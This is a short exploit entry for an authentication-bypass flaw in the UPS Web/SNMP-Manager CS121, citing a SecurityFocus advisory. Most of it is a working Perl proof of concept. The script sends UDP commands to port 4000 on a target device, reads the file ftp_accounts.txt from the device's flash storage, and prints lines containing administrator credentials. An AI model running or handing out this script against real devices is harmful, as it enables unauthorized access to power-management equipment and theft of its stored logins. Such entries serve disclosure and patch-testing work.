source: https://www.securityfocus.com/bid/67438/info
UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability.
Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service.#!/usr/bin/perl -w
use IO::Socket;
use constant MAXBYTES => scalar 1024;$socket = IO::Socket::INET->new( PeerPort=> 4000,
PeerAddr=> $ARGV[0],Type=> SOCK_DGRAM,
Proto => 'udp');$socket->send("<VERSION>");$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n";$socket->send("show syspar");$socket->recv($inline, MAXBYTES);
print "$inline\n";
print "Searching login\n";$socket->send("start");$socket->recv($inline, MAXBYTES);$socket->send("cd /flash");$socket->send("type ftp_accounts.txt");while($socket->recv($inline, MAXBYTES)){if($inline =~ /admin/ig){ print $inline;exit;}}sleep(1);
